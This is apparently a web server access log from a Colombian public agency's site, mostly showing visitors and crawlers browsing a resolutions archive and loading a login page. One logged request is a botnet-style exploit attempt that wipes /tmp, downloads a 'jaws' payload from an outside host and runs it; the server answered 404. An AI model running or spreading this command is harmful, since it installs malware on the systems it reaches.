186.29.108.142 - - [21/Mar/2022:21:13:54 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2018%2F HTTP/1.1" 200 258002
186.84.20.160 - - [21/Mar/2022:21:14:03 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
186.84.20.160 - - [21/Mar/2022:21:14:45 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2014%2F HTTP/1.1" 200 330271
186.84.20.160 - - [21/Mar/2022:21:15:01 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202014/0718.pdf HTTP/1.1" 200 877663
181.61.206.204 - - [21/Mar/2022:21:17:07 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
181.61.206.204 - - [21/Mar/2022:21:17:09 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2022%2F HTTP/1.1" 200 4258
216.245.221.92 - - [21/Mar/2022:21:17:10 -0500] "HEAD / HTTP/1.1" 200 -
181.61.206.204 - - [21/Mar/2022:21:17:17 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2021%2F HTTP/1.1" 200 329069
181.61.206.204 - - [21/Mar/2022:21:17:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/3626.pdf HTTP/1.1" 200 395227
199.16.157.183 - - [21/Mar/2022:21:17:39 -0500] "GET /images/eficiencia-energetica-11-marzo.jpg HTTP/1.1" 200 46478
199.16.157.182 - - [21/Mar/2022:21:17:39 -0500] "GET /images/eficiencia-energetica-11-marzo.jpg HTTP/1.1" 200 46478
40.77.167.46 - - [21/Mar/2022:21:20:20 -0500] "GET /bla/resoluciones/resoluciones%202021/2925.pdf HTTP/1.1" 200 398373
201.245.192.253 - - [21/Mar/2022:21:21:13 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45909
216.245.221.92 - - [21/Mar/2022:21:22:10 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Mar/2022:21:22:03 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45299
201.245.192.253 - - [21/Mar/2022:21:22:55 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 114555
207.46.13.209 - - [21/Mar/2022:21:25:46 -0500] "GET / HTTP/1.1" 200 319
216.245.221.92 - - [21/Mar/2022:21:27:10 -0500] "HEAD / HTTP/1.1" 200 -
156.219.79.238 - - [21/Mar/2022:21:28:52 -0500] "GET /shell?cd+/tmp;rm+-rf+*;wget+ jswl.jdaili.xyz/jaws;sh+/tmp/jaws HTTP/1.1" 404 1013
207.46.13.179 - - [21/Mar/2022:21:31:50 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2020%2F HTTP/1.1" 200 319481
201.245.192.253 - - [21/Mar/2022:21:31:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45909
216.245.221.92 - - [21/Mar/2022:21:32:10 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.179 - - [21/Mar/2022:21:32:40 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2019%2F HTTP/1.1" 200 234185
201.245.192.253 - - [21/Mar/2022:21:32:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45299
66.249.70.63 - - [21/Mar/2022:21:33:24 -0500] "-" 408 -
201.245.192.253 - - [21/Mar/2022:21:33:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 114555
207.46.13.157 - - [21/Mar/2022:21:34:07 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2018%2F HTTP/1.1" 200 426655
207.46.13.157 - - [21/Mar/2022:21:36:38 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2019%2F HTTP/1.1" 200 339392
181.55.68.51 - - [21/Mar/2022:21:37:08 -0500] "-" 408 -
216.245.221.92 - - [21/Mar/2022:21:37:10 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.179 - - [21/Mar/2022:21:37:01 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2009%2F HTTP/1.1" 200 749515
207.46.13.157 - - [21/Mar/2022:21:39:38 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2014%2F HTTP/1.1" 200 749515
181.61.206.204 - - [21/Mar/2022:21:40:14 -0500] "GET /BLA/resoluciones/AUTOS%202021/4755.pdf HTTP/1.1" 200 574703
66.249.70.63 - - [21/Mar/2022:21:41:59 -0500] "-" 408 -
201.245.192.253 - - [21/Mar/2022:21:41:12 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45909
216.245.221.92 - - [21/Mar/2022:21:42:10 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Mar/2022:21:42:01 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 45299
201.245.192.253 - - [21/Mar/2022:21:43:23 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 114555
186.28.12.94 - - [21/Mar/2022:21:46:19 -0500] "GET /programa-mujeres-que-reverdecen-tiene-cerca-de-200-cupos-disponibles.html HTTP/1.1" 200 1059
216.245.221.92 - - [21/Mar/2022:21:47:10 -0500] "HEAD / HTTP/1.1" 200 -
157.55.39.218 - - [21/Mar/2022:21:50:01 -0500] "GET /bla/resoluciones/resoluciones%202021/4970.pdf HTTP/1.1" 200 400455
216.245.221.92 - - [21/Mar/2022:21:52:10 -0500] "HEAD / HTTP/1.1" 200 -
186.84.20.160 - - [21/Mar/2022:21:52:16 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
186.84.20.160 - - [21/Mar/2022:21:52:27 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2003%2F HTTP/1.1" 200 31404
186.84.20.160 - - [21/Mar/2022:21:52:37 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2003%2FRES+2003+601-650%2F HTTP/1.1" 200 11292
186.84.20.160 - - [21/Mar/2022:21:52:44 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202003/RES%202003%20601-650/642.tif HTTP/1.1" 200 176300
207.46.13.209 - - [21/Mar/2022:21:53:17 -0500] "GET /bla/resoluciones/notificaciones/autos%202019/3123.pdf HTTP/1.1" 200 298024
61.135.159.132 - - [21/Mar/2022:21:53:17 -0500] "GET / HTTP/1.1" 200 319
201.245.192.253 - - [21/Mar/2022:21:53:06 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 114555
186.84.20.160 - - [21/Mar/2022:21:54:18 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
186.84.20.160 - - [21/Mar/2022:21:54:34 -0500] "GET /BLA/resoluciones/index.php?dir=AUTOS+2013%2F HTTP/1.1" 200 405309
186.84.20.160 - - [21/Mar/2022:21:55:12 -0500] "GET /BLA/resoluciones/ HTTP/1.1" 200 13093
186.84.20.160 - - [21/Mar/2022:21:55:23 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2013%2F HTTP/1.1" 200 237088
186.84.20.160 - - [21/Mar/2022:21:55:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202013/0643.pdf HTTP/1.1" 200 1591379
216.245.221.92 - - [21/Mar/2022:21:57:10 -0500] "HEAD / HTTP/1.1" 200 -
181.237.7.109 - - [21/Mar/2022:21:59:52 -0500] "GET /sipse/faces/index.xhtml HTTP/1.1" 200 677
181.237.7.109 - - [21/Mar/2022:21:59:52 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 200 50058
181.237.7.109 - - [21/Mar/2022:21:59:52 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
181.237.7.109 - - [21/Mar/2022:21:59:52 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12177
181.237.7.109 - - [21/Mar/2022:21:59:53 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 200 3230
181.237.7.109 - - [21/Mar/2022:21:59:53 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 200 12592
181.237.7.109 - - [21/Mar/2022:21:59:53 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 200 9694
181.237.7.109 - - [21/Mar/2022:21:59:53 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 200 443
181.237.7.109 - - [21/Mar/2022:21:59:53 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.237.7.109 - - [21/Mar/2022:21:59:53 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css?ln=primefaces&v=4.0 HTTP/1.1" 200 542
181.237.7.109 - - [21/Mar/2022:21:59:53 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css?ln=primefaces&v=4.0 HTTP/1.1" 200 53295
181.237.7.109 - - [21/Mar/2022:21:59:53 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 200 105384
181.237.7.109 - - [21/Mar/2022:21:59:53 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 200 220526
181.237.7.109 - - [21/Mar/2022:21:59:53 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 200 87560
181.237.7.109 - - [21/Mar/2022:21:59:53 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 200 276924
181.237.7.109 - - [21/Mar/2022:21:59:53 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 200 53064
181.237.7.109 - - [21/Mar/2022:21:59:53 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 200 71635
181.237.7.109 - - [21/Mar/2022:21:59:53 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 200 5355
181.61.206.204 - - [21/Mar/2022:22:00:50 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2021%2F HTTP/1.1" 200 290979
181.61.206.204 - - [21/Mar/2022:22:01:07 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/4755.pdf HTTP/1.1" 200 781546
181.52.20.217 - - [21/Mar/2022:22:01:58 -0500] "-" 408 -
216.245.221.92 - - [21/Mar/2022:22:02:10 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [21/Mar/2022:22:02:58 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 114555
103.178.236.102 - - [21/Mar/2022:22:04:22 -0500] "GET /dispatch.asp HTTP/1.1" 404 1018
186.84.22.122 - - [21/Mar/2022:22:04:44 -0500] "GET /galeria/galeria/jquery.fancybox.css?v=2.1.5 HTTP/1.1" 200 4895
157.55.39.218 - - [21/Mar/2022:22:05:42 -0500] "GET /bla/resoluciones/notificaciones/autos%202019/2025.pdf HTTP/1.1" 200 283932
199.16.157.181 - - [21/Mar/2022:22:06:20 -0500] "GET /images/eficiencia-energetica-11-marzo.jpg HTTP/1.1" 200 46478
216.245.221.92 - - [21/Mar/2022:22:07:10 -0500] "HEAD / HTTP/1.1" 200 -
66.249.70.49 - - [21/Mar/2022:22:07:43 -0500] "-" 408 -
207.46.13.179 - - [21/Mar/2022:22:10:02 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES+2003%2FRES+2003+601-650%2F HTTP/1.1" 200 11292
40.77.191.222 - - [21/Mar/2022:22:10:04 -0500] "GET /BLA/resoluciones/dlf/styles.css HTTP/1.1" 200 3049
181.237.7.109 - - [21/Mar/2022:22:10:40 -0500] "GET /sipse/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12499
181.237.7.109 - - [21/Mar/2022:22:10:40 -0500] "GET /sipse/js/disable_browser_buttons.js HTTP/1.1" 200 3230
181.237.7.109 - - [21/Mar/2022:22:10:40 -0500] "GET /sipse/css/custom_css_sg_prime_login.css HTTP/1.1" 200 443
181.237.7.109 - - [21/Mar/2022:22:10:40 -0500] "GET /sipse/css/custom_css_sg.css HTTP/1.1" 200 9694
181.237.7.109 - - [21/Mar/2022:22:10:40 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.css;jsessionid=k4uzrOoQrYJ9M06yf17k0Tp-.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 542
181.237.7.109 - - [21/Mar/2022:22:10:40 -0500] "GET /sipse/js/funciones.js HTTP/1.1" 200 12592
181.237.7.109 - - [21/Mar/2022:22:10:40 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 200 50058
181.237.7.109 - - [21/Mar/2022:22:10:40 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.css;jsessionid=k4uzrOoQrYJ9M06yf17k0Tp-.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 53295
181.237.7.109 - - [21/Mar/2022:22:10:40 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js;jsessionid=k4uzrOoQrYJ9M06yf17k0Tp-.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 105384
181.237.7.109 - - [21/Mar/2022:22:10:40 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js;jsessionid=k4uzrOoQrYJ9M06yf17k0Tp-.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 87560
181.237.7.109 - - [21/Mar/2022:22:10:40 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js;jsessionid=k4uzrOoQrYJ9M06yf17k0Tp-.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 220526
181.237.7.109 - - [21/Mar/2022:22:10:40 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js;jsessionid=k4uzrOoQrYJ9M06yf17k0Tp-.undefined?ln=primefaces&v=4.0 HTTP/1.1" 200 276924
181.237.7.109 - - [21/Mar/2022:22:10:40 -0500] "GET /sipse/faces/javax.faces.resource/images/ui-icons_898989_256x240.png?ln=primefaces-aristo HTTP/1.1" 200 5355
181.237.7.109 - - [21/Mar/2022:22:10:40 -0500] "GET /sipse/css/imagen/logoSDG.png HTTP/1.1" 200 53064
181.237.7.109 - - [21/Mar/2022:22:10:40 -0500] "GET /sipse/css/imagen/loginimg.png HTTP/1.1" 200 71635
181.237.7.109 - - [21/Mar/2022:22:10:40 -0500] "GET /sipse/faces/faces/index.xhtml HTTP/1.1" 200 677
181.237.7.109 - - [21/Mar/2022:22:10:40 -0500] "GET /sipse/faces/javax.faces.resource/theme.css?ln=primefaces-sipse HTTP/1.1" 304 -
181.237.7.109 - - [21/Mar/2022:22:10:40 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
181.237.7.109 - - [21/Mar/2022:22:10:40 -0500] "GET /sipse/faces/faces/faces/autenticacion.xhtml HTTP/1.1" 200 12177
